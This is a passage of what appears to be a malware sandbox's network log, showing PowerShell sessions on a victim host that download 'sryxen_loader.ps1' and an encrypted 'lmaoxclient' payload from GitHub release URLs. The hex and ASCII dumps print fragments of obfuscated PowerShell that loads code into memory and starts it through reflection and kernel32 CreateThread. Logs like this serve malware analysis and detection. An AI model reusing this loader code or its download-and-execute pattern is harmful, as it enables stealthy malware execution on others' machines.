System.Reflection.AssemblyName(('R'+'eflect'+'edDelegat'+'e'))), [System.Reflection.Emit.AssemblyBuilderAccess]::"r`UN").('DE'+('finedy'+'nA')+('Micm'+'O')+'dU'+'lE').Invoke(('I'+'nMem'+'oryM'+'od'+'ule'), $false).(('dEF'+'in')+'e'+('Ty'+'pE')).Invoke((
2025-01-08 09:15:46 UTC	734	IN	Data Raw: 30 30 30 2c 20 30 78 34 30 29 0a 5b 53 79 73 74 65 6d 2e 52 75 6e 74 69 6d 65 2e 49 6e 74 65 72 6f 70 53 65 72 76 69 63 65 73 2e 4d 61 72 73 68 61 6c 5d 3a 3a 28 27 43 6f 27 2b 27 70 59 27 29 2e 49 6e 76 6f 6b 65 28 24 62 6c 61 7a 65 74 68 65 67 72 65 61 74 2c 20 30 2c 20 24 6c 70 4d 65 6d 2c 20 24 62 6c 61 7a 65 74 68 65 67 72 65 61 74 2e 22 4c 65 60 4e 60 47 74 48 22 29 0a 24 68 54 68 72 65 61 64 20 3d 20 5b 53 79 73 74 65 6d 2e 52 75 6e 74 69 6d 65 2e 49 6e 74 65 72 6f 70 53 65 72 76 69 63 65 73 2e 4d 61 72 73 68 61 6c 5d 3a 3a 28 27 67 65 27 2b 28 27 54 64 65 27 2b 27 4c 27 29 2b 28 27 45 27 2b 27 67 61 74 45 27 29 2b 27 46 6f 27 2b 27 52 27 2b 28 27 66 75 6e 63 27 2b 27 54 49 27 2b 27 6f 4e 70 27 29 2b 27 6f 69 27 2b 27 4e 54 27 2b 27 65 52 27 29 2e Data Ascii: 000, 0x40)[System.Runtime.InteropServices.Marshal]::('Co'+'pY').Invoke($blazethegreat, 0, $lpMem, $blazethegreat."Le`N`GtH")$hThread = [System.Runtime.InteropServices.Marshal]::('ge'+('Tde'+'L')+('E'+'gatE')+'Fo'+'R'+('func'+'TI'+'oNp')+'oi'+'NT'+'eR').

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.7	49939	140.82.121.3	443	7968	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-08 09:15:46 UTC	217	OUT	GET /EvilBytecode/Sryxen/releases/download/v1.0.0/sryxen_loader.ps1 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 Host: github.com Connection: Keep-Alive
2025-01-08 09:15:47 UTC	964	IN	HTTP/1.1 302 Found Server: GitHub.com Date: Wed, 08 Jan 2025 09:15:33 GMT Content-Type: text/html; charset=utf-8 Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With Location: https://objects.githubusercontent.com/github-production-release-asset-2e65be/884985882/df985353-b412-45be-a5df-5d50a4ddaf53?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=releaseassetproduction%2F20250108%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20250108T091533Z&X-Amz-Expires=300&X-Amz-Signature=71849342e45026ae948e7cc8f90ab3779bcd14dee0966a571aa2cf9824444811&X-Amz-SignedHeaders=host&response-content-disposition=attachment%3B%20filename%3Dsryxen_loader.ps1&response-content-type=application%2Foctet-stream Cache-Control: no-cache Strict-Transport-Security: max-age=31536000; includeSubdomains; preload X-Frame-Options: deny X-Content-Type-Options: nosniff X-XSS-Protection: 0 Referrer-Policy: no-referrer-when-downgrade
2025-01-08 09:15:47 UTC	3379	IN	Data Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 63 68 69 6c 64 2d 73 72 63 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 20 67 69 74 68 75 62 2e 63 6f 6d 2f 77 65 62 70 61 63 6b 2f 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 20 67 69 73 74 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 75 70 6c 6f 61 64 73 2e 67 69 74 68 75 62 2e 63 6f 6d 20 77 77 77 2e 67 69 74 68 75 62 73 74 61 74 75 73 2e 63 6f 6d 20 63 6f 6c 6c 65 63 74 6f 72 2e 67 69 74 68 75 62 2e 63 6f Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; child-src github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.co

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.7	49945	140.82.121.3	443	7376	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-08 09:15:47 UTC	201	OUT	GET /43a1723/test/releases/download/siu/lmaoxclient HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 Host: github.com Connection: Keep-Alive
2025-01-08 09:15:47 UTC	958	IN	HTTP/1.1 302 Found Server: GitHub.com Date: Wed, 08 Jan 2025 09:15:34 GMT Content-Type: text/html; charset=utf-8 Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With Location: https://objects.githubusercontent.com/github-production-release-asset-2e65be/805647875/b2a5a7dc-5521-4d20-afaf-8cef231516e5?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=releaseassetproduction%2F20250108%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20250108T091534Z&X-Amz-Expires=300&X-Amz-Signature=9fdf61ee1f5b4e28977c1309ad3394caf7c66405c5945baf7eacf935f35496e5&X-Amz-SignedHeaders=host&response-content-disposition=attachment%3B%20filename%3Dlmaoxclient&response-content-type=application%2Foctet-stream Cache-Control: no-cache Strict-Transport-Security: max-age=31536000; includeSubdomains; preload X-Frame-Options: deny X-Content-Type-Options: nosniff X-XSS-Protection: 0 Referrer-Policy: no-referrer-when-downgrade
2025-01-08 09:15:47 UTC	3378	IN	Data Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 63 68 69 6c 64 2d 73 72 63 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 20 67 69 74 68 75 62 2e 63 6f 6d 2f 77 65 62 70 61 63 6b 2f 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 20 67 69 73 74 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 75 70 6c 6f 61 64 73 2e 67 69 74 68 75 62 2e 63 6f 6d 20 77 77 77 2e 67 69 74 68 75 62 73 74 61 74 75 73 2e 63 6f 6d 20 63 6f 6c 6c 65 63 74 6f 72 2e 67 69 74 68 75 62 2e 63 6f Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; child-src github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.co

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.7	49948	185.199.111.133	443	7968	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-08 09:15:47 UTC	650	OUT	GET /github-production-release-asset-2e65be/884985882/df985353-b412-45be-a5df-5d50a4ddaf53?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=releaseassetproduction%2F20250108%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20250108T091533Z&X-Amz-Expires=300&X-Amz-Signature=71849342e45026ae948e7cc8f90ab3779bcd14dee0966a571aa2cf9824444811&X-Amz-SignedHeaders=host&response-content-disposition=attachment%3B%20filename%3Dsryxen_loader.ps1&response-content-type=application%2Foctet-stream HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 Host: objects.githubusercontent.com Connection: Keep-Alive
2025-01-08 09:15:47 UTC	846	IN	HTTP/1.1 200 OK Connection: close Content-Length: 3418 Content-Type: application/octet-stream Last-Modified: Thu, 07 Nov 2024 20:29:49 GMT ETag: "0x8DCFF6AED64A11E" Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0 x-ms-request-id: 35071e22-901e-0028-6735-4f80fd000000 x-ms-version: 2024-11-04 x-ms-creation-time: Thu, 07 Nov 2024 20:29:49 GMT x-ms-blob-content-md5: aXiAyvuBlhXMnGlrTXMY2w== x-ms-lease-status: unlocked x-ms-lease-state: available x-ms-blob-type: BlockBlob Content-Disposition: attachment; filename=sryxen_loader.ps1 x-ms-server-encrypted: true Via: 1.1 varnish, 1.1 varnish Fastly-Restarts: 1 Accept-Ranges: bytes Date: Wed, 08 Jan 2025 09:15:47 GMT Age: 0 X-Served-By: cache-iad-kiad7000095-IAD, cache-ewr-kewr1740058-EWR X-Cache: HIT, MISS X-Cache-Hits: 17, 0 X-Timer: S1736327748.675655,VS0,VE7
2025-01-08 09:15:47 UTC	1378	IN	Data Raw: 24 50 72 6f 67 72 65 73 73 50 72 65 66 65 72 65 6e 63 65 20 3d 20 28 27 53 69 6c 27 2b 27 65 6e 74 27 2b 27 6c 27 2b 27 79 43 6f 6e 74 69 6e 75 27 2b 27 65 27 29 0d 0a 66 75 6e 63 74 69 6f 6e 20 53 72 79 78 65 6e 4c 6f 61 64 65 72 20 7b 0d 0a 20 20 20 20 50 61 72 61 6d 20 28 24 6d 6f 64 2c 20 24 66 63 65 29 0d 0a 20 20 20 20 24 61 73 73 65 6d 20 3d 20 28 5b 41 70 70 44 6f 6d 61 69 6e 5d 3a 3a 22 63 55 60 52 60 52 65 60 4e 54 64 4f 4d 61 49 6e 22 2e 28 28 27 47 45 27 2b 27 54 27 29 2b 28 27 61 73 27 2b 27 53 27 29 2b 28 27 45 6d 42 4c 49 65 27 2b 27 53 27 29 29 2e 49 6e 76 6f 6b 65 28 29 20 7c 20 3f 20 7b 20 24 5f 2e 22 47 6c 4f 60 42 61 4c 61 73 53 60 65 4d 42 4c 59 60 43 60 41 63 68 45 22 20 2d 61 6e 64 20 24 5f 2e 22 6c 6f 60 43 61 60 54 49 6f 4e 22 2e Data Ascii: $ProgressPreference = ('Sil'+'ent'+'l'+'yContinu'+'e')function SryxenLoader { Param ($mod, $fce) $assem = ([AppDomain]::"cU`R`Re`NTdOMaIn".(('GE'+'T')+('as'+'S')+('EmBLIe'+'S')).Invoke() \| ? { $_."GlO`BaLasS`eMBLY`C`AchE" -and $_."lo`Ca`TIoN".
2025-01-08 09:15:47 UTC	1378	IN	Data Raw: 27 65 66 6c 65 63 74 27 2b 27 65 64 44 65 6c 65 67 61 74 27 2b 27 65 27 29 29 29 2c 20 5b 53 79 73 74 65 6d 2e 52 65 66 6c 65 63 74 69 6f 6e 2e 45 6d 69 74 2e 41 73 73 65 6d 62 6c 79 42 75 69 6c 64 65 72 41 63 63 65 73 73 5d 3a 3a 22 72 60 55 4e 22 29 2e 28 27 44 45 27 2b 28 27 66 69 6e 65 64 79 27 2b 27 6e 41 27 29 2b 28 27 4d 69 63 6d 27 2b 27 4f 27 29 2b 27 64 55 27 2b 27 6c 45 27 29 2e 49 6e 76 6f 6b 65 28 28 27 49 27 2b 27 6e 4d 65 6d 27 2b 27 6f 72 79 4d 27 2b 27 6f 64 27 2b 27 75 6c 65 27 29 2c 20 24 66 61 6c 73 65 29 2e 28 28 27 64 45 46 27 2b 27 69 6e 27 29 2b 27 65 27 2b 28 27 54 79 27 2b 27 70 45 27 29 29 2e 49 6e 76 6f 6b 65 28 28 27 4d 79 44 27 2b 27 65 6c 65 67 61 74 65 54 79 27 2b 27 70 27 2b 27 65 27 29 2c 20 28 27 43 6c 27 2b 27 61 73 27 Data Ascii: 'eflect'+'edDelegat'+'e'))), [System.Reflection.Emit.AssemblyBuilderAccess]::"r`UN").('DE'+('finedy'+'nA')+('Micm'+'O')+'dU'+'lE').Invoke(('I'+'nMem'+'oryM'+'od'+'ule'), $false).(('dEF'+'in')+'e'+('Ty'+'pE')).Invoke(('MyD'+'elegateTy'+'p'+'e'), ('Cl'+'as'
2025-01-08 09:15:47 UTC	662	IN	Data Raw: 73 2e 4d 61 72 73 68 61 6c 5d 3a 3a 28 27 43 6f 27 2b 27 70 59 27 29 2e 49 6e 76 6f 6b 65 28 24 73 72 79 78 65 6e 2c 20 30 2c 20 24 6c 70 4d 65 6d 2c 20 24 73 72 79 78 65 6e 2e 22 4c 65 60 4e 60 47 74 48 22 29 0d 0a 24 68 54 68 72 65 61 64 20 3d 20 5b 53 79 73 74 65 6d 2e 52 75 6e 74 69 6d 65 2e 49 6e 74 65 72 6f 70 53 65 72 76 69 63 65 73 2e 4d 61 72 73 68 61 6c 5d 3a 3a 28 27 67 65 27 2b 28 27 54 64 65 27 2b 27 4c 27 29 2b 28 27 45 27 2b 27 67 61 74 45 27 29 2b 27 46 6f 27 2b 27 52 27 2b 28 27 66 75 6e 63 27 2b 27 54 49 27 2b 27 6f 4e 70 27 29 2b 27 6f 69 27 2b 27 4e 54 27 2b 27 65 52 27 29 2e 49 6e 76 6f 6b 65 28 28 53 72 79 78 65 6e 4c 6f 61 64 65 72 20 6b 65 72 6e 65 6c 33 32 2e 64 6c 6c 20 43 72 65 61 74 65 54 68 72 65 61 64 29 2c 20 28 64 65 6c 67 Data Ascii: s.Marshal]::('Co'+'pY').Invoke($sryxen, 0, $lpMem, $sryxen."Le`N`GtH")$hThread = [System.Runtime.InteropServices.Marshal]::('ge'+('Tde'+'L')+('E'+'gatE')+'Fo'+'R'+('func'+'TI'+'oNp')+'oi'+'NT'+'eR').Invoke((SryxenLoader kernel32.dll CreateThread), (delg

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.7	49952	185.199.111.133	443	7376	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-08 09:15:48 UTC	644	OUT	GET /github-production-release-asset-2e65be/805647875/b2a5a7dc-5521-4d20-afaf-8cef231516e5?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=releaseassetproduction%2F20250108%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20250108T091534Z&X-Amz-Expires=300&X-Amz-Signature=9fdf61ee1f5b4e28977c1309ad3394caf7c66405c5945baf7eacf935f35496e5&X-Amz-SignedHeaders=host&response-content-disposition=attachment%3B%20filename%3Dlmaoxclient&response-content-type=application%2Foctet-stream HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 Host: objects.githubusercontent.com Connection: Keep-Alive
2025-01-08 09:15:48 UTC	841	IN	HTTP/1.1 200 OK Connection: close Content-Length: 69589 Content-Type: application/octet-stream Last-Modified: Tue, 05 Nov 2024 10:11:14 GMT ETag: "0x8DCFD822E7CC71F" Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0 x-ms-request-id: 04fa98ee-901e-004a-320e-4642da000000 x-ms-version: 2024-11-04 x-ms-creation-time: Tue, 05 Nov 2024 10:11:14 GMT x-ms-blob-content-md5: jFLq8nh2MBNP1YMhZvGQhA== x-ms-lease-status: unlocked x-ms-lease-state: available x-ms-blob-type: BlockBlob Content-Disposition: attachment; filename=lmaoxclient x-ms-server-encrypted: true Via: 1.1 varnish, 1.1 varnish Fastly-Restarts: 1 Accept-Ranges: bytes Age: 0 Date: Wed, 08 Jan 2025 09:15:48 GMT X-Served-By: cache-iad-kcgs7200098-IAD, cache-ewr-kewr1740069-EWR X-Cache: HIT, MISS X-Cache-Hits: 33, 0 X-Timer: S1736327748.419224,VS0,VE7
2025-01-08 09:15:48 UTC	1378	IN	Data Raw: e8 c0 ad 00 00 c0 ad 00 00 7a 69 d4 d8 07 d3 f6 f6 2c 16 98 b8 dd fb 3b 2a 5b f3 a6 7c f6 3f a9 26 5e 81 ab 33 9e c2 d4 0b 00 00 00 00 16 38 af 01 58 81 86 02 d9 37 bf 91 ed 78 8b 2c 50 f7 d0 18 ed f9 d8 c5 a8 b9 fb fe e6 3b 46 ac 4e 9b d6 67 b8 44 ef 9d fb 5f 32 ba 30 78 33 21 2b 89 db 15 29 62 e8 1f 71 8e e9 fd 84 27 e9 1f b9 49 09 7a c0 b2 c8 54 85 de 77 4a b8 e6 59 15 ee 43 d5 33 a9 bd 9b 9d dc 26 e1 f3 21 08 d5 7d 45 65 0d 43 1c 4a d4 06 4a 8d de b5 b2 60 ab ae 3c 16 76 b2 a9 0c 0c e5 27 a3 44 01 66 ce 67 8e 2c da 69 a0 28 04 2e f6 75 2b d2 a8 33 f3 6c 3b 68 cc c5 fd d6 2a 07 df 21 5f 5a 97 6e a9 eb 28 df c5 42 68 b6 3b e6 2e ba ad 61 ab d8 77 36 f4 68 05 62 49 cb 29 7b 8f 1f d4 85 b9 d4 c9 4f 17 94 dc 12 ce a9 2e d8 7f dd 9f ed 35 5a a4 f7 29 85 19 Data Ascii: zi,;[\|?&^38X7x,P;FNgD_20x3!+)bq'IzTwJYC3&!}EeCJJ`<v'Dfg,i(.u+3l;h!_Zn(Bh;.aw6hbI){O.5Z)
2025-01-08 09:15:48 UTC	1378	IN	Data Raw: 71 18 cf ab ab 34 e2 7e fd 3e b0 fe 29 6b 5f d5 99 5a 38 0c 9d a6 b8 53 9a 8f 20 d4 0a cc 07 a4 ea 01 e9 67 dc 7e 79 3a a5 7b fc 47 f3 55 c1 b8 26 34 97 49 f2 ec c6 0d ca 8d f1 5c fb c4 ee 3b 48 68 36 0e c0 08 13 30 61 df 44 4d 10 31 38 5d 5f fa d4 c5 a7 b5 a9 3f b9 f6 9d 32 49 22 c7 5f 2a e8 a7 6b c4 a4 d6 30 7f ce bd dd 02 e9 c6 d1 1f 6e d2 6e 4d 07 89 26 87 3c 26 29 b4 73 3d 98 c4 e2 e4 3d 13 65 a7 b3 4f 64 34 b3 49 22 65 c4 98 2a 63 42 6f e8 b6 71 2f 7d 82 fc a9 96 41 53 82 d5 31 ab 46 31 bd f6 fd 0c e0 22 6d 29 07 9c 72 40 ce ce a7 82 6a a8 e6 ab 13 5e f3 c5 d0 90 50 4e ac 44 27 21 34 62 2c ef b4 14 95 12 4a 57 85 bd 9e 7e b5 e4 db 83 21 29 84 90 c8 1b 4a aa 81 b1 ee 2d ca 4e 6d 6a 63 4c 7b b8 20 1b 4a 47 79 ef 20 01 69 7b b7 f1 3e 48 d9 d8 e5 2d d5 Data Ascii: q4~>)k_Z8S g~y:{GU&4I\;Hh60aDM18]_?2I"_k0nnM&<&)s==eOd4I"ecBoq/}AS1F1"m)r@j^PND'!4b,JW~!)J-NmjcL{ JGy i{>H-
2025-01-08 09:15:48 UTC	1378	IN	Data Raw: ce 69 bb e9 aa 2e 4f ee 62 d5 27 96 8c 0b 69 d8 48 e0 c5 95 5b 84 cb f4 fb af 9e f3 32 fe c7 3e c1 aa 60 78 d2 0d d5 00 e4 df 01 cf cb 35 37 cf e3 7f 80 15 71 db 6e 70 43 2e 6c 08 3c 5b e7 9b de e9 a0 f9 32 c6 5f 5b 01 28 f2 75 8b 2e 3a a3 7f 9b e7 b6 52 6a 0b bc d5 c9 f7 d2 b5 13 fc e2 7d 6e 0c a9 b5 19 b0 2f 19 31 8a 72 8e 51 85 ac 43 a8 27 32 a8 b5 de 6e db 45 fe e8 79 15 c5 2a be cc a6 f6 3f 1c c6 6d 98 d0 ce cd f8 0c 40 d6 6a d6 85 1a 2e 8c 31 a8 09 4e 70 75 d9 72 f7 c7 40 b5 37 41 4a 9f 3f d9 56 69 e0 88 68 2f 5e 05 6b ed c1 c1 d2 30 75 33 85 44 0c 3f 0b e8 6b 28 1e a1 3c fd 4d dd bd 75 33 58 02 cb 1b f0 77 30 de 39 da fe 9a 8c 96 f2 90 38 3c c3 8c 7e 00 4d 2b ae 6f 2c 65 9a d9 4f 75 4f 69 c0 09 79 e7 a2 59 11 6e ee 08 93 22 d9 15 45 65 69 56 f6 5d Data Ascii: i.Ob'iH[2>`x57qnpC.l<[2_[(u.:Rj}n/1rQC'2nEy*?m@j.1Npur@7AJ?Vih/^k0u3D?k(<Mu3Xw098<~M+o,eOuOiyYn"EeiV]
2025-01-08 09:15:48 UTC	1378	IN	Data Raw: 2a e3 08 be 26 4f f4 d3 b5 40 7c d5 82 8b d5 3a cc a5 e4 3b 0f e0 cf ad 69 f6 ab c3 6a b4 48 fc e5 2a fb 24 86 91 6c 20 00 84 ef 58 b9 69 50 80 2a 71 22 b1 ef f4 f0 7c 9d 2c 5f 30 a4 57 29 13 3e 0f 41 38 38 9b f5 4d 2d 7b ef 63 2b bd 2b ad 94 2b 44 03 cc 24 1b d6 bc 6f 1c da ce 8a d1 1d 29 68 3e 80 07 75 67 43 6f 16 8e 75 93 c5 c6 cd 05 f5 3f 59 0a 68 8a 72 a1 e9 3f 2a 5c 5e bc 5d 0f ea 80 2d 4f c2 b7 89 5d 2f 25 d8 30 44 b4 16 2e 69 3f 6c d3 17 b0 b2 3e a2 3d 2a 5a f0 36 dd 4a dc 60 35 7b 41 fc d3 c2 b9 5a 17 5a 09 9b 25 c6 4d b2 6a c8 72 97 eb 9c ad 63 07 83 0b 35 d1 7c cb 02 78 b6 61 95 be 23 f2 de 01 23 db 81 e5 52 5b 01 40 ed dd d4 d5 e8 b8 04 95 12 e4 3b ce 42 91 96 1a d7 c8 2d 5d 60 ad 55 32 f4 b3 a9 79 77 a1 27 af a2 57 d9 f8 2e 3a a4 85 c6 6b 6d Data Ascii: &O@\|:;ijH$l XiPq"\|,_0W)>A88M-{c+++D$o)h>ugCou?Yhr?\^]-O]/%0D.i?l>=*Z6J`5{AZZ%Mjrc5\|xa##R[@;B-]`U2yw'W.:km
2025-01-08 09:15:48 UTC	1378	IN	Data Raw: 60 f9 77 a4 e0 ca ae f2 99 1a c2 7c a0 cb fb d7 3c 56 56 21 a0 9a 1f 24 bb 41 14 9e 22 be d1 02 f6 87 c9 e4 97 74 dd d2 b6 43 05 d4 71 4f a6 fd 1e ac 60 e8 01 f9 d6 7c 48 20 c1 a1 f8 31 37 31 ee be c3 64 5e 9d 0a 74 9a e9 b4 33 a6 f0 3c 9a 90 ad c3 c5 f6 7b 35 b7 20 e6 6f 74 6a 0e 6f 2d d0 ae 33 55 f2 e9 d2 21 8d 95 dd 56 0f 85 39 01 9b 27 d1 2f f5 dd 59 08 8c 88 ea f4 05 c7 05 6c 75 1d ab 6a 2f f8 98 1f 28 0a d1 58 bc 5e 87 ff 6d 20 15 ac da 81 b6 3a 95 e0 c6 2d 97 3e dc 74 b6 ac 76 eb 68 e0 6b f0 0a f6 b8 61 6b cc 5c 1a 3a 61 10 de 39 42 33 bb f1 72 e2 f8 f1 43 26 8c 68 e6 fa 56 d7 26 4b 9a cb 34 b8 f5 5e 0e 94 64 71 1c d6 18 39 13 51 0a ee a3 7a 72 ed 3d a3 46 66 17 ab 4e e1 b6 86 7f 2d fe b8 12 15 0e 57 d2 88 25 28 78 64 57 e6 89 a9 e2 af 8c 8c 19 3e Data Ascii: `w\|<VV!$A"tCqO`\|H 171d^t3<{5 otjo-3U!V9'/Yluj/(X^m :->tvhkak\:a9B3rC&hV&K4^dq9Qzr=FfN-W%(xdW>
2025-01-08 09:15:48 UTC	1378	IN	Data Raw: f8 ec 59 7d b2 b8 2f c6 9c 5e 48 7f c1 50 47 44 2d b2 22 60 bb 11 be f6 2f 13 72 08 3b b1 2b e0 6b 86 f6 ee 47 ad 7d 35 cd b1 7c 0d 1c a8 25 f4 ef 01 ec f7 18 f4 1f 53 e9 3e 8a 1e 3a a0 db 42 57 f8 0c a9 e8 f0 fe 05 3e 65 67 df 21 89 24 2a 48 85 57 c8 b7 27 7e 05 ba 31 43 7b e6 39 c3 91 78 b1 4b a4 ce 60 e3 65 32 2a 4e c4 ae 01 6b 78 b8 33 f6 e4 5e 4b 12 93 a4 53 62 d6 7b b0 f7 55 8f 35 86 28 d2 95 66 0c 92 e9 8e 2f fc 94 54 d3 c9 df b2 31 ce c2 67 5b 2e 48 8b 50 24 43 d7 f0 ad ea fd fd a4 7c 77 ae 08 ac 25 89 41 d8 3f ec 8a 20 cc a5 a2 f1 e5 0f 00 de 9e fc d4 07 76 a8 f5 06 d9 3b 10 ad 83 f9 d1 ca 81 aa ab c9 4a 08 3f 00 89 b7 4c c8 a9 48 7e a2 a6 bb 96 55 64 2b 23 79 b9 fa cb 79 74 4f d3 01 95 48 05 d2 47 dd a1 df 48 5d 93 98 b0 cb 7d 6f ba c5 a4 dd e1 Data Ascii: Y}/^HPGD-"`/r;+kG}5\|%S>:BW>eg!$HW'~1C{9xK`e2Nkx3^KSb{U5(f/T1g[.HP$C\|w%A? v;J?LH~Ud+#yytOHGH]}o
2025-01-08 09:15:48 UTC	1378	IN	Data Raw: b0 8b 80 18 f9 b4 7d 05 a3 eb 1e 14 e9 fd 3f 99 56 43 9b 48 d3 c7 f8 c6 d1 9c dc c9 33 4b 2c 72 d5 21 d7 68 31 65 75 2a 68 2b 6e be 02 95 ca 80 29 ea d3 07 9b 31 6f f1 a5 06 8a c4 ca 2d 84 03 9e 51 17 54 b1 47 f7 ac ca 5c 79 cd ab 77 4c 25 c1 dd db 07 bb fd ad 2d 97 c5 69 d5 74 41 7c 82 ad fd 1b 31 77 04 44 c7 82 8d 54 cb 49 1b f6 e4 ca d1 61 11 26 00 c8 8c b0 64 82 aa b4 f1 a3 f9 73 80 d4 f2 01 4d 05 a0 5a db d2 43 ff c3 fa 6c 22 65 6b dc 1b 2d 57 63 e6 84 c1 be 89 c2 b1 3f ef 57 2b 88 9f c0 83 2d ea 29 7a b2 0e b9 5f ec b6 07 08 6d 71 21 39 2b 8d ea b3 7e e5 8f 71 d3 d8 42 fb 13 f9 9c ff 31 7a fb ff c7 a5 cd 57 e3 43 58 8f 93 3e 89 a4 95 69 f2 01 f6 cc d6 c0 f7 5f 67 84 68 ec 45 f2 86 9a cf e8 fb 1b 1e 99 e8 8f d2 40 5d 0c 52 92 04 6a 4e 9d 86 e2 4f e6 Data Ascii: }?VCH3K,r!h1eu*h+n)1o-QTG\ywL%-itA\|1wDTIa&dsMZCl"ek-Wc?W+-)z_mq!9+~qB1zWCX>i_ghE@]RjNO
2025-01-08 09:15:48 UTC	1378	IN	Data Raw: 16 a8 42 c3 bf fc 53 aa 4d 8a 8b 4a 17 e7 38 e2 96 ec ce 2c 6a b4 be a7 d4 63 db 99 76 08 8d b5 a2 04 a5 8a 4f 6e 60 c1 38 f3 e0 ad ef 9e 93 fa 3a e0 d9 4b 83 2e 18 07 23 47 e6 c0 a9 9a bc fd 64 17 8f 58 0a 65 ff 8e 99 5f 59 2a b8 a7 2d 14 59 dc d3 6b 86 86 4e 06 98 93 fa b3 69 8c 94 04 e2 09 3a 59 f8 11 f5 89 dc 59 d6 5c a2 fe 5d be bf c9 8c 86 e7 18 ba 5d ed 65 98 08 1d 30 7e d7 2e 56 cc f5 93 43 31 e6 c1 82 3d 36 7c fe c1 4e fd 0b aa e3 6a fd ff f9 0e 4c e0 c4 db 3d 78 99 81 52 04 f0 d0 fa d3 7b 70 d1 5a 41 69 6d aa cf eb fc ff 0f ce 34 81 be 31 60 e2 66 44 9c 3b 3e ba 9c 2d f9 d2 f4 6a 0c 0b 9b f9 57 82 8d 2c 21 9a 09 b2 7e 46 aa f7 fe 26 66 e9 b9 4c 4f 3f 08 5b 11 c8 bb f2 2d e1 34 d8 23 8c 0f 80 50 58 82 b5 bb 77 93 7e cd 7e 89 74 09 09 28 3c 76 c2 Data Ascii: BSMJ8,jcvOn`8:K.#GdXe_Y*-YkNi:YY\]]e0~.VC1=6\|NjL=xR{pZAim41`fD;>-jW,!~F&fLO?[-4#PXw~~t(<v
2025-01-08 09:15:48 UTC	1378	IN	Data Raw: 10 8a c2 11 a8 64 19 40 f6 c9 07 66 01 88 a0 11 9c 07 aa ab cb f7 fe d3 82 ca 19 e1 25 84 61 69 c7 6e 0d 11 a2 d4 52 fa 82 05 b6 07 ea 6e e5 83 42 d8 87 d3 76 45 a3 f1 9e f7 96 fa 9c d5 21 f8 cb ea df 9d f6 59 57 90 32 06 88 76 6f 52 ee 6d b8 13 b0 bf 80 cb f8 96 52 07 5c 01 5d 09 d3 55 86 3d 1f fd e5 91 57 9a 62 58 37 ce 7d e6 14 46 c7 b5 be f1 26 69 46 9c 67 f4 72 1d 28 30 8f 69 1d 94 fc c4 8b 23 06 7e 37 65 f2 29 14 fa fb 6f 75 d6 7b 27 d8 0b 7d fe b2 40 9a 0d b7 00 d9 b3 8c 89 5b 69 ee 68 17 ea 46 e0 03 45 04 21 c9 af c0 28 0b 5d 45 ec 2d b9 00 12 ce 1d 65 03 b4 17 db b7 e3 73 b1 71 7c a7 a0 71 6d 07 c8 ce 71 bd 